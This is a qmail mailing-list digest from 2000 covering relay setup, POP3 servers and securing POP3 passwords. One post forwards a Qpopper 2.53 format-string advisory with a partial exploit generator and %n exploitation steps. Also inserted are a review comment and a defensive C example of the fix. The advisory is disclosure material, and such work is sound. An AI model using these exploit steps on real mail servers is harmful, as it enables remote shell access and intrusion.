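    printf '%s -> %s\n' "$demo_dom" "$(classify_domain "$demo_dir" "$demo_dom")"
done
echo "routes shadowed by locals/virtualdomains: $(shadowed_routes "$demo_dir")"
rm -rf "$demo_dir"
```

Pointing classify_domain at a copy of a real control directory also shows the case where rcpthosts is missing altogether, in which every recipient domain is accepted.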
hi,

i'm a bit in trouble for now. i set up qmail and all works ok. then i use /etc/aliases with fastforward, and after that the machine acts as a relay.

following situation :

we are hosting several domains, each has for example a [EMAIL PROTECTED] etc. there is also an old mail-server using a different domain which is actually the "real" mail server where our staff get its mail from.

so the new server has to do following :

all mail for domain foo.com should go to bar.com
mail from [EMAIL PROTECTED] should go to [EMAIL PROTECTED]
mail from [EMAIL PROTECTED] should also go to me
mail from [EMAIL PROTECTED] should go to [EMAIL PROTECTED]
mail from [EMAIL PROTECTED] should go to [EMAIL PROTECTED]
and so on....

only known rcpts should be allowed, so i put all our domains in in rcpthosts and locals

smtproutes shows:

real.mail:[12.34.56.78]

but i can send mail to ANY host. ANYbody can do that. how to stop that ?

please, please help........ it drives me nuts......
Hi !

I installed qmail successfully on a linux 2.2.x host before. Now I am trying to do the same thing on a SunOS 5.7 server. I used gcc-2.95.2 to compile qmail and followed the installation instructions carefully and created maildirs for my users and changed /var/qmail/rc to use the maildir format. But when I come to the stage of testing the installation (as described in TEST.deliver), I can see all four daemons running using "ps -ef", but nothing appears in syslog!! and when I try

    echo to: testuser | /var/qmail/bin/qmail-inject

.. nothing reach testuser !!.

Any suggestions ??

Thanks in advance.
Dear netters,

we are using qmail 1.03 (instead of sendmail) on SGI O2. Qmail is configured to work w/mbox format (binmail for local delivery to /var/mail/user). We want to install pop-3 (or imap) daemon on this workstation. Unfortunately qmail-pop3d operates only w/Maildir format. Is there some other pop-3/imap daemons which can work successfully in cooperation w/qmail ?

Thanks for your help.

Mikhail Kuzminsky
Zelinsky Institute of Organic Chemistry
Moscow
On Wed, May 24, 2000 at 08:19:13PM +0400, Mikhail Kuzminsky wrote:
[snip]
> Is there some other pop-3/imap daemons which can work
> successfully in cooperation w/qmail ?

Sure, lots of 'm. http://freshmeat.net/appindex/daemons/pop3.html should be helpful.

Greetz, Peter.
--
[EMAIL PROTECTED] - Peter van Dijk [student:developer:madly in love]

Is there a templet user for QMAIL?
Hi Walid,

what do you mean by "templet user"?

regards
Christian

Walid Kassab wrote:
> Is there a templet user for QMAIL?

Not quite sure what you mean, but have you had a look at qmailadmin? It creates users with their Maildirs etc by the click of a button. Or else another way would be to create a skel with all the necessary info there and run a script using useradd and skel.

Mark

Hi-

I think you mean "user template". I am not sure about BSD, but in Linux, you add the stuff you want new users to have to the /etc/skel directory.

The qmail utility "maildirmake" will create a maildir in a certain directory. If you tell maildirmake to create one in /var/skel, then all new users will get a maildir.

see: man maildirmake

In the basic Linux install of qmail, it is located at: /var/qmail/bin/maildirmake

I hope this helps...

--Pete

Haven't seen this forwarded to the list, and it probably applies to quite a few people. Just in case someone isn't on bugtraq.

BTW, in my source (2.53) i couldn't find any lines similar to what he suggests changing, perhaps he was looking at the FBSD ported version and it has been modified slightly, i dunno....

--
John Gonzalez/Net.Tech
MDC Computers/netMDC!
(505)437-7600/fax-437-3052
http://www.netmdc.com
[---------------------------------------------[system info]-----------]
1:20pm up 13 days, 18:46, 4 users, load average: 0.08, 0.22, 0.21

---------- Forwarded message ----------
Date: Tue, 23 May 2000 09:43:33 -800
From: Prizm <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Qpopper 2.53 remote problem, user can gain gid=mail

I have attached to this message the advisory with full details + exploit on this problem.

Prizm/b0f,
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5

Advisory Name: Remote shell via Qpopper2.53
Date: 5/23/00
Application: Qpopper 2.53 for *NIX
Vendor: Qualcomm Incorporated
WWW: www.qualcomm.com
Severity: can give users remote shell with gid=mail.
Author: prizm ([EMAIL PROTECTED])
Homepage: b0f.freebsd.lublin.pl

* Overview

Qpopper is the most widely-used server for the POP3 protocol. This allows users to access their mail using any POP3 client. Qpopper supports the latest standards, and includes a large number of optional features. Qpopper is normally used with standard UNIX mail transfer and delivery agents such as sendmail or smail.

* The Problem

Yes, Qpop, again and again... There is a bug in version 2.53 of Qpop that can give you a remote shell with gid=mail. Problem is with euidl command which uses user input as format string for pop_msg() function.

Let's examine following code from Qpop 2.53 source:

--> pop_uidl.c, around line 150:
    ................
      sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
      if (nl = index(buffer, NEWLINE)) *nl = 0;
      sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
 !    return (pop_msg (p,POP_SUCCESS, buffer));
                                      ^^^^^^^^^^^^^
    .................

Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, const char *format,...), and here we have user-input as format string. Lame.

Ok, back to problem, imagine following smtp session:

    MAIL FROM:<[EMAIL PROTECTED]>
    200 Ok
    RCPT TO:<[EMAIL PROTECTED]>
    200 Ok
    data
    200 Okey, okey. end with "."
    Subject: still trust qpop?=/
    X-UIDL: AAAAAAAAAAAAAAAA
    From: %p%p%p%p%p%p%p
    test
    .
    200 BLABLABLA Ok, message accepted for delivery.

Then, luser connects with his pop account and runs euidl command there:

    +OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
    USER luser
    +OK Password required for luser.
    PASS secret
    +OK luser has 3 messages (1644 octets).
    euidl 3
    +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028

Yeah, that's from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p were implemented as arguments for vsnprintf() command.

* Exploiting

Is this possible? Yeah, sure! But there are some limits. Qpopper2.53 from FreeBSD ports with patches is much more difficult to exploit than one from linux. It is because freebsd patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is big difference between them. Qpopper with FreeBSD's patches IS exploitable.

Exploit
-------

/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
 *
 * Sample exploit for buffer overflow in Qpopper 2.53.
 * This little proggie generates a mail u need to send.
 *
 * Standard disclaimer applies.
 * By the way, exploit is broken =) You need to insert shellcode.
 *
 * MAD greets to tf8 for pointing out the bug, and all other b0f members.
 * greets to USSRLabs and ADM
 * check http://b0f.freebsd.lublin.pl/ for news.
 */
#include <stdio.h>
#include <string.h>

char shellcode[]="imnothing";

int main(int argc, char *argv[])
{
    int i;
    unsigned long ra=0;
    if(argc!=2) {
        fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
        exit(0);
    }
    sscanf(argv[1], "%x", &ra);
    if(!ra)
        return;
    if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
        fprintf(stderr,"Bad shellcode\n");
        exit(0);
    }
    fprintf(stderr,"return address: 0x%.8x\n", ra);
    printf("X-UIDL: ");
    for(i=0; i < sizeof(shellcode);i++)
        printf("%c", shellcode[i]);
    printf("\r\n");
    printf("From: %s", "%.1000d");
    for(i=0; i < 50; i++)
        printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);
    printf("@test\r\n");
    printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
    return 0;
}

Exploiting QPOP from FreeBSD ports
----------------------------------

It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't overflow stack, but we still have control over it (remember %n?). I'm not going to post exploit for this because it is really generic, but I will explain theory on exploiting qpop with vsNprintf.

There is a little trick with %n you should know. Try to understand why following code succeeds and prints out 2000, not sizeof(b):

---<cut>---
#include <stdio.h>
int main(void){
    int s=1;
    char b[1024];
    int q;
    snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
    return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
---</cut>---

On my box with FreeBSD 3.4 i have:

    2000, overflowed? NO

Hah, first time i expected to see 1024, but you know that all is unpredictable. So, this little thing will help us a lot.

Exploiting it:
a) Find where in stack is located user input.
b) Compose a message with fields X-UIDL and From:
     X-UIDL: ppRETARETARETARETA
     From: <SHELLCODE>%.RETURNd%n@test
   where:
     "pp" is for padding (two or three chars)
     "RETA" is return address pointing to SHELLCODE
     "SHELLCODE" guess
     "RETURN" return address
c) Exploit?
If you need an exploit that will work on FreeBSD, code it yourself.

* Vulnerable Versions

2.53(Others?)

* Fix

You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which is not vulnerable to this problem.

Or you can manually patch it by doing the following: At lines 150 and 62 from pop_msg.c, replace: - return (pop_msg (p,POP_SUCCESS, buffer)); to: + return (pop_msg (p,POP_SUCCESS, "%s", buffer));

copyright © 1999-2000 prizm, buffer0verfl0w security
b0f.freebsd.lublin.pl

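Review bot: the replacement is located "At lines 150 and 62 from pop_msg.c", but the call being changed is quoted earlier in the advisory from pop_uidl.c, around line 150, and pop_msg.c is only named as the place where pop_msg() is declared; the fix should name the file that actually holds the two return (pop_msg (p,POP_SUCCESS, buffer)); calls, otherwise a reader patching by hand cannot find them. The "%s" change also leaves the preceding sprintf(buffer, "%s %d %.128s", buffer, ...) untouched, which reads from and writes to the same buffer with no length bound; building the reply in a separate, size-checked destination belongs in the same patch.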
Wasn't it claimed that 2.53 was safe -- only earlier versions (alpha/beta?) were at risk? Seems like they should just release another version to lessen the confusion.

Scott

Unknown. The advisory specifically mentions 2.53 -- i can tell you this. 2.53 _was_ safe from the PREVIOUS exploits (ie. the ones that worked on the 2.51, etc) but this appears to be a new exploit in a different function of the program.

Also, the advisory suggests upgrading to 3.1b1 (which i did) and says that it's a safe version (for now, anyway)

Are there any known exploits for 2.1b1?

On Wed, 24 May 2000, Scott D. Yelich wrote:

>Wasn't it claimed that 2.53 was safe -- only earlier versions
>(alpha/beta?) were at risk? Seems like they should just release
>another version to lessen the confusion.
>
>Scott

--
John Gonzalez/Net.Tech
MDC Computers/netMDC!
(505)437-7600/fax-437-3052
http://www.netmdc.com
[---------------------------------------------[system info]-----------]
1:30pm up 13 days, 18:56, 4 users, load average: 0.16, 0.16, 0.17

John Gonzalez/netMDC admin <[EMAIL PROTECTED]> writes:

> Unknown. The advisory specifically mentions 2.53 -- i can tell you this.
> 2.53 _was_ safe from the PREVIOUS exploits (ie. the ones that worked on
> the 2.51, etc) but this appears to be a new exploit in a different
> function of the program.

2.53 appears to be vulnerable.

> Also, the advisory suggests upgrading to 3.1b1 (which i did) and says
> that it's a safe version (for now, anyway)

The 3.x series has been having *tons* of security problems, including stuff that was previously fixed in 2.x. I really don't trust it.

--
Russ Allbery ([EMAIL PROTECTED]) <http://www.eyrie.org/~eagle/>

>The 3.x series has been having *tons* of security problems, including
>stuff that was previously fixed in 2.x. I really don't trust it.

There is really no point in using qpopper. I have used it in isp environment and i can say that it sucks. It doesn't do any mailbox locking, it just copies the whole thing to temp dir back and forth. this kills the performance. (is 3.x better?).

You have a broad choice:

a) qmail-pop3d - maildir only, lightweight, good
b) cucipop - this is what i use at the moment, mailbox only, fast, small
c) popa3d - by solar designer - small, fast, compatible, mailbox only
   http://freshmeat.net/redir/homepage/936847115/
d) solid pop3d - quality from Poland - like the above but with more features, maildir & mailbox
   http://solidpop3d.pld.org.pl/

Why waste your time with lame servers like qpop when you have so broad choice of better alternatives?

Kris

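The format-string bug from the advisory forwarded in this thread, as an added C example that is not part of the original posts or of Qpopper's source: the advisory's fixed call pattern beside the vulnerable one, a check that flags printf conversions in header text, and the snprintf() length behaviour behind the "%.2000d" demonstration (read here from the return value rather than with %n). The names reply_msg, reply_vulnerable, reply_fixed, count_conversions and was_truncated are hypothetical.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for Qpopper's pop_msg(): formats a reply line into
 * out[cap] and returns vsnprintf()'s result, i.e. the length the full reply
 * would need, which can exceed what was actually stored. */
static int reply_msg(char *out, size_t cap, const char *format, ...)
{
    va_list ap;
    int needed;

    va_start(ap, format);
    needed = vsnprintf(out, cap, format, ap);
    va_end(ap);
    return needed;
}

/* The pattern from the advisory: mail-derived text used AS the format. */
static int reply_vulnerable(char *out, size_t cap, const char *hdr)
{
    return reply_msg(out, cap, hdr);
}

/* The advisory's fix: constant format, mail-derived text passed as data. */
static int reply_fixed(char *out, size_t cap, const char *hdr)
{
    return reply_msg(out, cap, "%s", hdr);
}

/* Count printf conversions in untrusted text ("%%" is a literal percent).
 * A non-zero count in a mail header is worth logging. */
static int count_conversions(const char *s)
{
    int n = 0;

    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%')
            s++;                /* escaped percent: skip both characters */
        else if (s[1] != '\0')
            n++;
    }
    return n;
}

/* 1 if the reply did not fit (or formatting failed), 0 if stored whole. */
static int was_truncated(int needed, size_t cap)
{
    return needed < 0 || (size_t)needed >= cap;
}

int main(void)
{
    char buf[1024];
    const char *hostile = "%p%p%p%p%p%p%p"; /* From: value in the advisory */
    const char *benign = "100%% done";      /* constructed; takes no arguments */
    int needed;

    reply_fixed(buf, sizeof buf, hostile);
    printf("fixed:      %s (%d conversions flagged)\n",
           buf, count_conversions(hostile));

    /* Only the benign string goes through the vulnerable path here: "%%" is
     * consumed as a directive, which shows the text is being interpreted. */
    reply_vulnerable(buf, sizeof buf, benign);
    printf("vulnerable: %s\n", buf);

    /* The advisory's "%.2000d" case: the full length is reported even though
     * only sizeof buf - 1 bytes are stored. */
    needed = reply_msg(buf, sizeof buf, "%.2000d", 1);
    printf("needed=%d stored=%zu truncated=%d\n",
           needed, strlen(buf), was_truncated(needed, sizeof buf));
    return 0;
}
```

Any code that uses the reported length (or a %n count) as the number of bytes actually written repeats the mistake the advisory relies on; compare it against the buffer size first.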
I'm using qmail 1.0.3 with the included qmail-pop3d. What's the best way on the server side to prevent passwords from being sent as clear text over the network for a pop3 session? I know users will be reluctant to change their mua's. So what can I do on my side? Is there any way around this without expecting anything from the pop users?
[EMAIL PROTECTED] wrote:
>
> What's the best way on the server side to prevent passwords from being
> sent as clear text over the network for a pop3 session?

I'm afraid the best way is also the only way, and it doesn't exist. You cannot use POP3 without sending passwords in the clear.

Len.

--
VENONA traffic was broken by the NSA because the Soviets reused their one time pads.
    -- Bruce Schneier

It is possible to wrap POP3 with SSL, which most mailers support. Take a look at http://www.rickk.com/sslwrap/

--Adam

On Wed, May 24, 2000 at 03:38:53PM -0400, Len Budney wrote:
> [EMAIL PROTECTED] wrote:
> >
> > What's the best way on the server side to prevent passwords from being
> > sent as clear text over the network for a pop3 session?
>
> I'm afraid the best way is also the only way, and it doesn't exist. You
> cannot use POP3 without sending passwords in the clear.
>
> Len.
>
> --
> VENONA traffic was broken by the NSA because the Soviets reused their
> one time pads.
>     -- Bruce Schneier

[EMAIL PROTECTED] (Len Budney) writes:

> [EMAIL PROTECTED] wrote:
> >
> > What's the best way on the server side to prevent passwords from being
> > sent as clear text over the network for a pop3 session?
>
> I'm afraid the best way is also the only way, and it doesn't exist. You
> cannot use POP3 without sending passwords in the clear.

What about SSH connection forwarding?

^L

I was reading a howto about that and from what I understand, that's a client side deal.

Louis Theran wrote:

> [EMAIL PROTECTED] (Len Budney) writes:
>
> > [EMAIL PROTECTED] wrote:
> > >
> > > What's the best way on the server side to prevent passwords from being
> > > sent as clear text over the network for a pop3 session?
> >
> > I'm afraid the best way is also the only way, and it doesn't exist. You
> > cannot use POP3 without sending passwords in the clear.
>
> What about SSH connection forwarding?
>
> ^L

--
i no naka no kawazu taikai wo shirazu

[EMAIL PROTECTED] writes:

[ not sending POP3 passwords in the clear. I suggested SSH connection forwarding. ]

> I was reading a howto about that and from what I understand, that's a
> client side deal.

Set up sshd on a host that shares a trusted link with your pop server (or on the pop server itself). Configure the pop server to reject connections not originating from inside the trusted network. Have users set their SSH clients to forward connections to localhost:110 to popserver:110 (on UNIX this looks something like: ssh -L110:popserver:110 sshhost) and point their email readers at localhost. Now all your POP3 traffic is encrypted over untrusted networks.

This isn't the only way to secure POP3, but it's easy, general and very portable. Other options include Kerberos and the SSLwrap thing that somebody else mentioned.

My original comment was merely pointing out that `there is no way' is correct only in a narrow sense.

^L

"Louis Theran" <[EMAIL PROTECTED]> wrote:
> [EMAIL PROTECTED] (Len Budney) writes:
>
> > [EMAIL PROTECTED] wrote:
> > >
> > > What's the best way on the server side to prevent passwords from being
> > > sent as clear text over the network for a pop3 session?
> >
> > I'm afraid the best way is also the only way, and it doesn't exist. You
> > cannot use POP3 without sending passwords in the clear.
>
> What about SSH connection forwarding?

That's a dandy idea. However, once you do that it's not POP3 anymore. In particular, the clients have to set up forwarding, which violates the part about ``on the server side'' above.

(You weren't suggesting port forwarding from the server to itself, of course, which would be a silly idea.)

Len.

--
Frugal Tip #9: Fence stolen merchandise.

"Louis Theran" <[EMAIL PROTECTED]> wrote:
>
> My original comment was merely pointing out that `there is no way'
> is correct only in a narrow sense.

Right; namely, the sense in which the poster asked. He asked for a way to modify the server ONLY, and end up using POP3 without any passwords traveling en claire. I replied that THAT is impossible. Other things, of course, may or may not be impossible.

However, if ``most clients'' actually support SSL, then I may have simply been wrong. (I'm not gonna quibble that POP3+SSL isn't POP3, because although it isn't, who cares?) The original poster needs to know the definition of ``most clients'', and probably will have to run two POP3 servers--a secure one for savvy clients, and an insecure one for stupid clients. Unless ``most clients'' is an inclusive enough class.

Len.

--
It will work, and it's probably secure; but I didn't design it to run setuid, so don't do it.
    -- Dan Bernstein

   From: "Len Budney" <[EMAIL PROTECTED]>
   Date: Wed, 24 May 2000 15:38:53 -0400

   [EMAIL PROTECTED] wrote:
   >
   > What's the best way on the server side to prevent passwords from being
   > sent as clear text over the network for a pop3 session?

   I'm afraid the best way is also the only way, and it doesn't exist. You
   cannot use POP3 without sending passwords in the clear.

   Len.

Why not require APOP?

    -- Bob Rogers

Len Budney writes:
> [EMAIL PROTECTED] wrote:
> >
> > What's the best way on the server side to prevent passwords from being
> > sent as clear text over the network for a pop3 session?
>
> I'm afraid the best way is also the only way, and it doesn't exist. You
> cannot use POP3 without sending passwords in the clear.

Doesn't anybody implement APOP??

--
-russ nelson <[EMAIL PROTECTED]> http://russnelson.com
Crynwr sells support for free software | PGPok | "Ask not what your country
521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to
Potsdam, NY 13676-3213 | +1 315 268 9201 FAX | do for you..." -Perry M.

Russell Nelson <[EMAIL PROTECTED]> writes:
> Len Budney writes:

>> I'm afraid the best way is also the only way, and it doesn't exist. You
>> cannot use POP3 without sending passwords in the clear.

> Doesn't anybody implement APOP??

Even better, there are innumerable different authentication mechanisms possible once you use SASL, including ones considerably better than APOP, and POP3 definitely supports SASL.

You can definitely use POP3 without cleartext passwords.

--
Russ Allbery ([EMAIL PROTECTED]) <http://www.eyrie.org/~eagle/>

on 5/24/00 8:03 PM, Russell Nelson at [EMAIL PROTECTED] wrote:

>> I'm afraid the best way is also the only way, and it doesn't exist. You
>> cannot use POP3 without sending passwords in the clear.
>
> Doesn't anybody implement APOP??

The Gnome/Helixcode guys are working on an outlook type app that does APOP. Outlook Express for the mac does SSL and "secure password" but does not mention APOP in the docs or in the configuration.

Pat

[EMAIL PROTECTED] wrote:
>
> I'm using qmail 1.0.3 with the included qmail-pop3d.
>
> What's the best way on the server side to prevent passwords from being
> sent as clear text over the network for a pop3 session? I know users
> will be reluctant to change their mua's. So what can I do on my side?
> Is there any way around this without expecting anything from the pop
> users?

I use stunnel which doesn't require changes on qmail. Check this: http://security.fi.infn.it/tools/stunnel/index-en.html. I can share my configuration with anyone interested.

LLU

Where do I find this program? Or any "vacation" program, preferably one that the user themselves can handle (edit message and starting / ending time etc).

--
Kaare Rasmussen     --Linux, games,--     Tel: 3816 2582
Kaki Data           tshirts, merchandize  Fax: 3816 2582
Howitzvej 75        Open 14.00-18.00      Email: [EMAIL PROTECTED]
2000 Frederiksberg  Saturday 11.00-17.00  Web: www.suse.dk

Hi,

It's not a qmail question, but because many of you are in the high-volume mail business, I hope to get a few answers :-)

A colleague of mine works for a place where they're going to change from an X400 system to MS Exchange. I don't have details on the hardware, but they're planning on using 1 server per 1000 accounts.

I seem to remember to have read (maybe on this list) that Exchange doesn't like that amount of users, and that 300-400 is about the right number of accounts per server. MS literature speaks about 2000-15000 accounts per server, but that seems rather optimistic for PC class hardware, even when the network seems OK (in this case, switched 10Mb/s).

Any comments, cites on the ideal number of accounts per Exchange server?

Thanks a lot,

Stefaan
--
--PGP key available from PGP key servers (http://www.pgp.net/pgpnet/)--
Ninety-Ninety Rule of Project Schedules: The first ninety percent of the task takes ninety percent of the time, and the last ten percent takes the other ninety percent.

I am always happy when I see another "big" web operation using qmail.. I just discovered paypal.com runs qmail, after I got the "I'm sorry it didn't work out." bounce message from a typo... --Pete
>> On Wed, 24 May 2000 13:33:11 -0600 (MDT),
>> John Gonzalez/netMDC admin <[EMAIL PROTECTED]> said:

N> Are there any known exploits for 2.1b1?

CUCIpop has been mentioned on this list before; small, fast, some nifty features, and I don't remember seeing any security warnings about it.

ftp://ftp.informatik.rwth-aachen.de/pub/packages/cucipop/

--
Karl Vogel
ASC/YCOA, Wright-Patterson AFB, OH 45433, USA
[EMAIL PROTECTED] or [EMAIL PROTECTED]

Instead of getting married again, I'm going to find a woman I don't like and give her a house. --Lewis Grizzard

CUCIpop is pretty decent, I've used it before. Observations:

1) It's not actively developed (the most current version was released sometime in '98)
2) It doesn't compile cleanly on some platforms without disabling significant features (Solaris 2.6 and 7)
3) It *may* be just as insecure as qpopper -- just because there are no working exploits out doesn't mean the code is secure. It might just not be popular enough to warrant significant attention from crackers.
4) It's not totally free. If I remember correctly, the license requires some sort of homage or payment to the author to use it legally unless you are non-profit/etc.

That being said, it is a nice, fast and stable POP3 implementation.

--Adam

On Wed, May 24, 2000 at 05:07:08PM -0400, vogelke wrote:
> >> On Wed, 24 May 2000 13:33:11 -0600 (MDT),
> >> John Gonzalez/netMDC admin <[EMAIL PROTECTED]> said:
>
> N> Are there any known exploits for 2.1b1?
>
> CUCIpop has been mentioned on this list before; small, fast, some
> nifty features, and I don't remember seeing any security warnings
> about it.
>
> ftp://ftp.informatik.rwth-aachen.de/pub/packages/cucipop/
>
> --
> Karl Vogel
> ASC/YCOA, Wright-Patterson AFB, OH 45433, USA
> [EMAIL PROTECTED] or [EMAIL PROTECTED]
>
> Instead of getting married again, I'm going to find a
> woman I don't like and give her a house. --Lewis Grizzard

Does anyone know if there is a patch or set of patches for PINE that allow it to read mail over IMAPS (SSL IMAP)? We may be rolling out SSL IMAP and POP3 where I work, and the Windows clients all support this natively. Any help would be appreciated. Thanks, --Adam
i have to setup qmail with vpopmail/qmailadmin to forward all mail for domain-a.com to domain-a.nl

only domain-a.nl contains the users. so mail for [EMAIL PROTECTED] will be delivered to [EMAIL PROTECTED]

in control/virtualdomains:
domain-a.nl:domain-a.nl
domain-a.com:domain-a.nl

problem is that all mail for domain-a.com is delivered to [EMAIL PROTECTED] the catchall user.

greetings
marco leeflang

Christer Matson <[EMAIL PROTECTED]> schrieb/wrote:
> Is there a virus in the attachment? I ran Norton AV on it, but it did not
> find any.

I didn't send any attachments.

Claus
--
begin 666 LOVE-LETTER-FOR-YOU.TXT.vbs
Ich bin ein Signaturvirus. Verbreite mich!
end
http://www.faerber.muc.de/

>I didn't send any attachments.
>
>Claus

Beg to differ. Your emails contain the following:

> begin 666 LOVE-LETTER-FOR-YOU.TXT.vbs
> Ich bin ein Signaturvirus. Verbreite mich!
> end
> http://www.faerber.muc.de/

The 'begin' looks exactly like the start of a uuencoded file. Are you including this in your emails deliberately, or did you not know you were doing this?

_______________________________________________________________
This message has been checked for all known viruses by the MessageLabs Virus Control Centre. For further information visit http://www.messagelabs.com/stats.asp

You have the following attached to your message:

> --
> begin 666 LOVE-LETTER-FOR-YOU.TXT.vbs
> Ich bin ein Signaturvirus. Verbreite mich!
> end
> http://www.faerber.muc.de/
>

As you can see from the below copy of your message, the file LOVE-LETTER-FOR-YOU.TXT.vbs gets decoded by my MUA on receipt. This file has the same name as a well known virus.

In article <[EMAIL PROTECTED]>, Claus Färber wrote:
> Date: 25 May 2000 00:42:00 +0200
> From: [EMAIL PROTECTED] (Claus Färber)
> To: [EMAIL PROTECTED]
> Subject: Re: pop3
>
> Christer Matson <[EMAIL PROTECTED]> schrieb/wrote:
> > Is there a virus in the attachment? I ran Norton AV on it, but it did not
> > find any.
>
> I didn't send any attachments.
>
> Claus
>
> --
>
> [Attachment decoded to FILE://c:\TempDL\LOVE-LETTER-FOR-YOU.TXT.vbs]
> http://www.faerber.muc.de/
>

* eMailBye * Christer Matson, Siljansnas, Sweden * Science etSense AB * Thu, 25 May 2000 10:31 +0200
